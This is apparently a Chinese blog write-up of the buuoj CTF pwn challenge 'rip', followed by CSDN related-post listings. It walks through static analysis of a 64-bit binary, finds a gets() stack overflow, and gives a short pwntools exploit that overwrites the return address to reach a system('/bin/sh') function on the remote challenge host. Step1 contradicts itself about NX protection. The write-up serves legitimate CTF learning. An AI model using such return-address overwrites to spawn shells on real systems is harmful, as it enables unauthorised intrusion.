buuoj

于 2023-05-28 20:56:39 发布
阅读量51 收藏
点赞数 1
分类专栏: write up 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73605862/article/details/130917395
版权

题目(二):
【题型】PWN
【题目】rip
【来源】(buuoj)https://buuoj.cn/challenges#rip
【思路】栈溢出
【具体步骤】
Step1:使用checksec指令检查是否有保护,发现是一个没有任何保护(NX)的64位的程序,开启了栈不可执行。
在这里插入图片描述

Step2:将文件放到IDApro下进行静态分析。
在这里插入图片描述

Step3:点击view下的open subviews下的strings,然后发现bin/sh,点击查看
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

Step4:然后按下shift+X,发现/bin/sh的地址在fun函数里面,然后查看fun函数,(先找到fun函数,然后点击F5,如果被占用,则按下Fn加F5)顺便查看fun函数的起始地址。Fun函数内容发现返回system函数。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Step5:查看主函数,点击main,然后F5查看伪代码,发现里面有一个gets函数,s的长度为0xf(0x0+0x0f=0x0f),但是栈的大小只有15个字节,gets可以无限输入,所以存在栈溢出。
在这里插入图片描述
在这里插入图片描述

Step6:编写代码,构建exp。
源码为:

from pwn import *
p=remote("node4.buuoj.cn",26085)
payload='A'*15+'B'*8+p64(0x401186+1).decode("iso-8859-1")
p.sendline(payload)
p.interactive()

在这里插入图片描述

Step7:然后输入ls,发现可以与shell交互,然后查看文件有flag这个文件,查看这个文件,输入指令cat flag,得到flag。
在这里插入图片描述

22的卡卡
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuoj-crypto
Ennd_me的博客
04-29 284
buuoj-crypto
buuoj re逆向49-64题writeup(截图+c++源码+过程).doc
12-31
文章上传不了,用word的形式上传,buuoj re 逆向49-64题writeup(截图+c++源码+过程)
BUUOJ
zbbjya的博客
01-04 98
点击我们会看到网址栏哪里有一个/?file=flag.php 说明flag就在PHP的文件当中而现在我们没有看见flag 我们可以用、 页面跳转 变化了 然后你就会得到这样的数据 这样就会得到flag了
buuoj rsa
kevinhezhuzhu的博客
04-09 746
这是第一次接触rsa,先了解一下rsa是个啥东西。 说白了,rsa是一种加密算法,他的流程是: 1.随机找两个大的素数,并且相乘; 2.计算n=p*q,phi=(p-1)*(q-1); 3.任取一个大整数e,满足gcd(e,phi)=1,即他们的最大公约数为1,(满足e的条件很简单,比如,所有大于p和q的素数都可以用); 4.确定的解密钥d,满足(d*e)mod(phi)=1,即d*e=k(phi)+1; 5.设明文为m,密文为c,且满足c=(m^e)*mod(n); 6.密文c解密为明文m,
buuoj 爱因斯坦 writeup
m0_73605862的博客
05-23 198
Step3:发现zip文件加密,又因为题目也没有提示密码的位数或者是类型,所以肯定有其他的线索。试了图片隐写之类的也没发现,最后只有可能是备注信息。右键,点击属性,然后查看详细信息,在exif发现一串字符串猜测是密码。【来源】(buuoj)https://buuoj.cn/challenges#%E7%88%B1%E5%9B%A0%E6%96%AF%E5%9D%A6。Step1:打开发现就是一张图片,猜测含有隐藏文件。Step4:将这个输入密码得到flag。【思路】分离文件,查找密码。
buuoj EasySQL writeup
m0_73605862的博客
05-07 111
Step1:发现是sql注入,直接使用万能密码 admin’ or 1=1#。发现直接得到flag。【来源】(buuoj)https://buuoj.cn/【题目】[极客大挑战 2019]EasySQL。【思路】进行sql注入的万能密码。
buuoj Rabbit writeup
m0_73605862的博客
05-12 119
【来源】(buuoj)https://buuoj.cn/challenges#Rabbit。Step2:将字符串放在在线网页下进行解密,得到flag。Step1:根据提示猜测是Rabbit解密。【思路】直接进行Rabbit解密。【题型】crypto。【题目】Rabbit。
buuoj qr writeup
m0_73605862的博客
05-23 177
Step2:直接扫描二维码,得到flag。在线网页为:https://scanqr.org/#scan。【来源】(buuoj)https://buuoj.cn/challenges#qr。Step1:打开图片发现是一个二维码。【思路】直接扫描二维码。
Buuoj reverse1
just_a_fresh_man的博客
01-17 468
逆向题目 题目在这https://buuoj.cn/challenges#reverse1 1. 首先,就是直接调出字符串界面,然后找到里面含flag的任意字符串点击就完事了,就下面这样! 2. 然后因为我当时直接开了伪代码做的,所以……我就按我的理解解释下为什么伪代码是这样的把 3. 点完任意一个带flag的字符串以后再点击会跳转到这个界面 4. 顺带认识一下吧,第一个a的就是上面这个界面,中间那个是伪代码,最后一个b的就是你们的字符串界面 5. 然后我缩放了下窗口,就...
buuoj 签到 writeup
m0_73605862的博客
05-14 87
【来源】(buuoj)https://buuoj.cn/challenges#%E7%AD%BE%E5%88%B0。Step1:题目上就有flag。【思路】看题目得flag。
buuoj LSB writeup
m0_73605862的博客
05-22 277
Step2:根据提示是LSB解密,将图片放在stegsolve下,在analyse一栏里选择data extract,然后选择LSB的模式,按以下的图片进行选择。Step3:然后发现右边的ASCII上显示了PNG,显示是一张图片,然后点击save bin保存下来,记住命名的时候后缀名必需是png。Step5:然后扫码得flag,在线网页为:https://scanqr.org/#scan。【来源】(buuoj)https://buuoj.cn/challenges#qr。【思路】直接进行LSB图片解密。
buuoj re逆向1-64题writeup(截图+c++源码+过程).rar
12-31
buuoj re逆向1-64题writeup(截图+c++源码+过程) 与前面发的一模一样,只不过打包了,喜欢的可以支持一下
java外贸网站源码-buuoj:浮标
06-05
java外贸网站源码 LPOJ 一个基于Vue.js和Django的轻量级在线评测系统 目前应用于广东外语外贸大学 演示地址: 说明文档: 简述 轻量级,易于部署和自定义定制 前后端分离,提高服务器性能 支持多机器多进程判题,判...
GreatEscape
10-24
GreatEscape
密码学——RSA1
08-04
RSA是一种非对称加密算法,它是基于数论中的大数因子分解难题构建的,广泛应用于网络安全领域,如数据加密、数字签名等。该算法的核心在于一对密钥:公钥和私钥。公钥是公开的,任何人都可以获取,用于加密数据;...
ChatGPT原理1-3
06-20
ChatGPT原理1-3
aiohttp-3.4.0b2.tar.gz
最新发布
06-20
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
小程序版通过CNN训练识别印刷体数字和字母-不含数据集图片-含逐行注释和说明文档.zip
06-20
本代码是基于python pytorch环境安装的。 总共是3个py文件,十分的简便 且代码里面的每一行都是含有中文注释的,小白也能看懂代码 然后是关于数据集的介绍。 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行01数据集文本生成制作.py,是将数据集文件夹下的图片路径和对应的标签生成txt格式,划分了训练集和验证集。 运行02深度学习模型训练.py就会将txt文本中记录的训练集和验证集进行读取训练,训练好后会保存模型在本地。训练完成之后会有log日志保存本地,里面记录了每个epoch的验证集损失值和准确率。 运行03flask_服务端.py就可以生成与小程序交互的url了 然后需要我们运行微信开发者工具,如果之前没有下载过,则需要在电脑网页上,搜微信开发者工具进行下载。 导入我们的小
AI+智慧校园建设方案PPT(100页).pptx
06-20
智慧校园大数据信息化AIOT平台建设整体解决方案是一个综合性的校园智能化升级计划,旨在通过应用物联网、大数据、人工智能等高新技术,打造一个安全、便捷、绿色的校园环境。该方案遵循国家教育信息化2.0规划和相关标准,强调技术在教育领域的深度应用。 方案的核心内容包括全场景的智能互联、物信融合、AI赋能创新应用,以及校园营运指挥中心的建设。它涵盖了智慧管理、智慧服务、智慧教学等多个方面,通过SAAS、PAAS、DAAS、IAAS等多层次的系统架构,实现从数据存储、管理到智能分析和应用的全面覆盖。 智慧应用聚焦于校园特色场景,如教室、宿舍、图书馆和食堂,通过AI视频智能分析技术,提供便捷服务。方案还包括智能安防、智慧消防、能耗监管等,以实现校园的智能化管理。例如,人脸门禁系统提供无感通行,提高安全性和便捷性;车辆管理系统通过轨迹分析和布控,优化交通秩序。 此外,方案还强调了智能照明、智能水控和电控等节能环保措施,以及通过智能语音分析和录播方案提升教学质量。智慧宿舍通过人脸宿管和智能节电,提高宿舍管理效率。整体上,该方案通过技术集成和创新,推动校园向智能化、信息化转型,为师生创造更安全、便捷、环保的学习和生活环境。
buuoj rsa1
09-10
buuoj rsa1 是一个在线的CTF平台,rsa1是该平台上的一个题目。RSA1是基于RSA算法的一个加密解密题目。 在RSA算法中,加密的过程是通过公钥来完成的,而解密则需要使用私钥。在RSA1这道题目中,我们需要解密一个给定...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值